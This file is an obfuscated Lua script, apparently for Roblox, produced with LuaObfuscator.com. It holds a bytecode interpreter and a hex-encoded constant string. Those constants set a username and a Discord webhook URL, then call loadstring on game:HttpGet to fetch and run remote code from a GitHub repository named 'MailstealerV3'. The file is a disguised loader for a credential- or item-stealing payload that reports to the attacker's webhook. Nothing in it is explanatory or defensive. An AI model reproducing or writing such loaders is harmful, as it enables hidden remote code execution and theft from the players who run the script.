--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v66=v2(v0(v30,16));if v19 then local v78=v5(v66,v19);v19=nil;return v78;else return v66;end end end);local function v20(v31,v32,v33)if v33 then local v67=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-1) -(v32-(2 -1))) + 1)) ;return v67-(v67%(620 -(555 + 64))) ;else local v68=931 -(857 + 74) ;local v69;while true do if (v68==(568 -(367 + 201))) then v69=(929 -(214 + 713))^(v32-((878 -(282 + 595)) + 0)) ;return (((v31%(v69 + v69))>=v69) and 1) or (0 + (1637 -(1523 + 114))) ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=0 + (0 -0) ;local v36;local v37;while true do if (v35==(118 -(32 + 85))) then return (v37 * ((714 -(87 + 263)) -108)) + v36 ;end if (v35==(0 + 0)) then v36,v37=v1(v16,v18,v18 + (1067 -(68 + 997)) );v18=v18 + (4 -2) ;v35=1271 -(226 + 1044) ;end end end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + 3 );v18=v18 + (184 -(67 + 113)) ;return (v41 * (12302277 + 4474939)) + (v40 * 65536) + (v39 * (628 -372)) + v38 ;end local function v24()local v42=v23();local v43=v23();local v44=1;local v45=(v20(v43,1 + 0 ,79 -59 ) * ((954 -(802 + 150))^(85 -53))) + v42 ;local v46=v20(v43,37 -16 ,23 + 8 );local v47=((v20(v43,1029 -(915 + 82) )==(2 -1)) and  -(1 + 0)) or 1 ;if (v46==0) then if (v45==(0 -0)) then return v47 * 0 ;else v46=(4569 -3381) -(459 + 610 + (208 -90)) ;v44=(442 -(416 + 26)) -0 ;end elseif (v46==((4915 -(145 + 293)) -2430)) then return ((v45==(0 + (0 -0))) and (v47 * ((1 -0)/(0 + (430 -(44 + 386)))))) or (v47 * NaN) ;end return v8(v47,v46-(1814 -(368 + 423)) ) * (v44 + (v45/((6 -4)^(70 -(10 + 8))))) ;end local function v25(v48)local v49=0;local v50;local v51;while true do if (v49==(1487 -(998 + 488))) then v50=v3(v16,v18,(v18 + v48) -1 );v18=v18 + v48 ;v49=1 + (860 -(814 + 45)) ;end if (v49==(2 + 0)) then v51={};for v79=773 -(201 + 571) , #v50 do v51[v79]=v2(v1(v3(v50,v79,v79)));end v49=3;end if ((1138 -(116 + 1022))==v49) then v50=nil;if  not v48 then local v97=0 -0 ;while true do if (v97==(0 + (0 -0))) then v48=v23();if (v48==(0 -(0 + 0))) then return "";end break;end end end v49=3 -2 ;end if (v49==(2 + 1)) then return v6(v51);end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0 -0 ;local v53;local v54;local v55;local v56;local v57;local v58;while true do if (v52==3) then for v81=1,v23() do v54[v81-(1 -0) ]=v28();end return v56;end if (0==v52) then local v70=74 -(71 + 3) ;while true do if (v70==(1 + 0)) then v55={};v52=2 -1 ;break;end if (v70~=0) then else v53={};v54={};v70=1 -0 ;end end end if (v52~=(243 -(187 + 54))) then else local v71=0;local v72;while true do if (v71==(780 -(162 + 618))) then v72=0;while true do if ((1 + 0)~=v72) then else for v108=1 + 0 ,v23() do local v109=0 -0 ;local v110;local v111;local v112;local v113;while true do if (v109==(0 -0)) then v110=0;v111=nil;v109=1 + 0 ;end if (v109~=(1637 -(1373 + 263))) then else v112=nil;v113=nil;v109=2;end if (v109~=(1002 -(451 + 549))) then else while true do if (0~=v110) then else local v123=0;while true do if (v123==0) then v111=0;v112=nil;v123=1 + 0 ;end if (v123==(1 -0)) then v110=1 -0 ;break;end end end if ((1385 -(746 + 638))~=v110) then else v113=nil;while true do if (0==v111) then local v166=0 + 0 ;while true do if (v166==(0 -0)) then v112=341 -(218 + 123) ;v113=nil;v166=1582 -(1535 + 46) ;end if (v166==(1 + 0)) then v111=1;break;end end end if (v111~=1) then else while true do if (v112==(0 + 0)) then v113=v21();if (v20(v113,561 -(306 + 254) ,1)==(0 + 0)) then local v193=0 -0 ;local v194;local v195;local v196;local v197;while true do if (v193~=0) then else v194=0;v195=nil;v193=1468 -(899 + 568) ;end if (v193==(2 + 0)) then while true do if (v194==(0 -0)) then local v198=603 -(268 + 335) ;local v199;while true do if (v198==(290 -(60 + 230))) then v199=572 -(426 + 146) ;while true do if (v199==0) then local v209=0 + 0 ;while true do if (v209==(1456 -(282 + 1174))) then v195=v20(v113,813 -(569 + 242) ,3);v196=v20(v113,4,6);v209=2 -1 ;end if (v209~=1) then else v199=1 + 0 ;break;end end end if (v199~=(1025 -(706 + 318))) then else v194=1252 -(721 + 530) ;break;end end break;end end end if (v194~=(1272 -(945 + 326))) then else local v200=0;local v201;while true do if (0==v200) then v201=0;while true do if (v201~=1) then else v194=2;break;end if (v201==0) then local v210=0;while true do if (v210~=(2 -1)) then else v201=1;break;end if (v210~=(0 + 0)) then else v197={v22(),v22(),nil,nil};if (v195==(0 + 0)) then local v211=0;local v212;local v213;while true do if (v211==(1501 -(1408 + 92))) then while true do if ((1086 -(461 + 625))==v212) then v213=0;while true do if (v213==0) then v197[1291 -(993 + 295) ]=v22();v197[4]=v22();break;end end break;end end break;end if (v211~=0) then else local v215=0;while true do if (v215==0) then v212=0;v213=nil;v215=1;end if (v215~=1) then else v211=1 + 0 ;break;end end end end elseif (v195==(1172 -(418 + 753))) then v197[2 + 1 ]=v23();elseif (v195==2) then v197[3]=v23() -(2^16) ;elseif (v195~=3) then else local v217=0 + 0 ;local v218;local v219;while true do if (v217==(1 + 0)) then while true do if (v218==0) then v219=0 + 0 ;while true do if (v219==0) then v197[532 -(406 + 123) ]=v23() -((1771 -(1749 + 20))^(4 + 12)) ;v197[4]=v22();break;end end break;end end break;end if (v217~=(1322 -(1249 + 73))) then else v218=0 + 0 ;v219=nil;v217=1;end end end v210=1;end end end end break;end end end if (v194~=(1147 -(466 + 679))) then else if (v20(v196,2 -1 ,2 -1 )==1) then v197[2]=v58[v197[1902 -(106 + 1794) ]];end if (v20(v196,1 + 1 ,1 + 1 )==1) then v197[8 -5 ]=v58[v197[3]];end v194=7 -4 ;end if (v194~=(117 -(4 + 110))) then else if (v20(v196,587 -(57 + 527) ,1430 -(41 + 1386) )==(104 -(17 + 86))) then v197[3 + 1 ]=v58[v197[8 -4 ]];end v53[v108]=v197;break;end end break;end if (v193==1) then v196=nil;v197=nil;v193=5 -3 ;end end end break;end end break;end end break;end end break;end end end v52=3;break;end if (v72==(166 -(122 + 44))) then local v106=0;while true do if (v106==(0 -0)) then for v115=1,v57 do local v116=0 -0 ;local v117;local v118;local v119;local v120;while true do if (v116==1) then v119=nil;v120=nil;v116=2;end if (v116~=0) then else v117=0 + 0 ;v118=nil;v116=1;end if (v116~=(1 + 1)) then else while true do if (v117==0) then local v167=0;while true do if (v167==1) then v117=1;break;end if ((0 -0)~=v167) then else v118=0;v119=nil;v167=1;end end end if (v117~=1) then else v120=nil;while true do if (v118~=(65 -(30 + 35))) then else local v189=0 + 0 ;while true do if (v189==(1258 -(1043 + 214))) then v118=3 -2 ;break;end if (v189==0) then v119=v21();v120=nil;v189=1;end end end if (1==v118) then if (v119==1) then v120=v21()~=0 ;elseif (v119==2) then v120=v24();elseif (v119==3) then v120=v25();end v58[v115]=v120;break;end end break;end end break;end end end v56[3]=v21();v106=1213 -(323 + 889) ;end if (v106==(2 -1)) then v72=1;break;end end end end break;end end end if (v52==1) then local v73=580 -(361 + 219) ;local v74;while true do if (v73~=(320 -(53 + 267))) then else v74=0;while true do if (v74==1) then v58={};v52=1 + 1 ;break;end if (v74==(413 -(15 + 398))) then local v107=0;while true do if (v107~=1) then else v74=1;break;end if ((982 -(18 + 964))==v107) then v56={v53,v54,nil,v55};v57=v23();v107=851 -(20 + 830) ;end end end end break;end end end end end local function v29(v59,v60,v61)local v62=0;local v63;local v64;local v65;while true do if (v62==1) then v65=v59[3];return function(...)local v83=v63;local v84=v64;local v85=v65;local v86=v27;local v87=1;local v88= -1;local v89={};local v90={...};local v91=v12("#",...) -1 ;local v92={};local v93={};for v98=0,v91 do if (v98>=v85) then v89[v98-v85 ]=v90[v98 + 1 ];else v93[v98]=v90[v98 + 1 ];end end local v94=(v91-v85) + 1 ;local v95;local v96;while true do local v99=0;while true do if (v99==0) then v95=v83[v87];v96=v95[1];v99=1;end if (v99==1) then if (v96<=5) then if (v96<=2) then if (v96<=0) then v93[v95[2]]=v95[3];elseif (v96==1) then local v124;local v125,v126;local v127;local v128;v61[v95[3]]=v93[v95[2]];v87=v87 + 1 ;v95=v83[v87];if ((v95[3]=="_ENV") or (v95[3]=="getfenv")) then v93[v95[2]]=v61;else v93[v95[2]]=v61[v95[3]];end v87=v87 + 1 ;v95=v83[v87];if ((v95[3]=="_ENV") or (v95[3]=="getfenv")) then v93[v95[2]]=v61;else v93[v95[2]]=v61[v95[3]];end v87=v87 + 1 ;v95=v83[v87];v128=v95[2];v127=v93[v95[3]];v93[v128 + 1 ]=v127;v93[v128]=v127[v95[4]];v87=v87 + 1 ;v95=v83[v87];v93[v95[2]]=v95[3];v87=v87 + 1 ;v95=v83[v87];v128=v95[2];v125,v126=v86(v93[v128](v13(v93,v128 + 1 ,v95[3])));v88=(v126 + v128) -1 ;v124=0;for v156=v128,v88 do v124=v124 + 1 ;v93[v156]=v125[v124];end v87=v87 + 1 ;v95=v83[v87];v128=v95[2];v93[v128]=v93[v128](v13(v93,v128 + 1 ,v88));v87=v87 + 1 ;v95=v83[v87];v93[v95[2]]();v87=v87 + 1 ;v95=v83[v87];v87=v95[3];else v87=v95[3];end elseif (v96<=3) then do return;end elseif (v96>4) then v61[v95[3]]=v93[v95[2]];else v93[v95[2]]();end elseif (v96<=8) then if (v96<=6) then if ((v95[3]=="_ENV") or (v95[3]=="getfenv")) then v93[v95[2]]=v61;else v93[v95[2]]=v61[v95[3]];end elseif (v96==7) then local v144=0;local v145;local v146;local v147;local v148;while true do if (v144==0) then v145=v95[2];v146,v147=v86(v93[v145](v13(v93,v145 + 1 ,v95[3])));v144=1;end if (v144==1) then v88=(v147 + v145) -1 ;v148=0;v144=2;end if (v144==2) then for v187=v145,v88 do local v188=0;while true do if (v188==0) then v148=v148 + 1 ;v93[v187]=v146[v148];break;end end end break;end end else v93[v95[2]]=v95[3]~=0 ;end elseif (v96<=10) then if (v96==9) then local v150=0;local v151;local v152;while true do if (v150==1) then v93[v151 + 1 ]=v152;v93[v151]=v152[v95[4]];break;end if (v150==0) then v151=v95[2];v152=v93[v95[3]];v150=1;end end else local v153=0;while true do if (v153==0) then v61[v95[3]]=v93[v95[2]];v87=v87 + 1 ;v95=v83[v87];v93[v95[2]]=v95[3];v153=1;end if (3==v153) then v87=v95[3];break;end if (v153==1) then v87=v87 + 1 ;v95=v83[v87];v61[v95[3]]=v93[v95[2]];v87=v87 + 1 ;v153=2;end if (2==v153) then v95=v83[v87];v93[v95[2]]=v95[3];v87=v87 + 1 ;v95=v83[v87];v153=3;end end end elseif (v96>11) then if (v93[v95[2]]==v95[4]) then v87=v87 + 1 ;else v87=v95[3];end else local v154=0;local v155;while true do if (v154==0) then v155=v95[2];v93[v155]=v93[v155](v13(v93,v155 + 1 ,v88));break;end end end v87=v87 + 1 ;break;end end end end;end if (v62==0) then v63=v59[1];v64=v59[2];v62=1;end end end return v29(v28(),{},v17)(...);end v15("LOL!0B3O00028O00026O00F03F030D3O004C6F6164696E675363722O656E030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F45676F72696B7573612F4D61696C737465616C657256332F6D61696E2F6D61696E03083O00557365726E616D6503063O0048346B342O7203073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O31393833303936372O31333O36313536352F55767A446B476A625F49425F323862735242755F7159445474383147644F71576C2D637069483867445532684149696C5541313259395271444A6A726B3239563739445400163O00124O00013O00260C3O000D000100020004023O000D00012O0008000100013O001201000100033O00122O000100043O00122O000200053O00202O00020002000600122O000400076O000200046O00013O00024O00010001000100044O0015000100260C3O0001000100010004023O0001000100122O000100093O00120A000100083O00122O0001000B3O00122O0001000A3O00124O00023O00044O000100012O00033O00017O00",v9(),...);
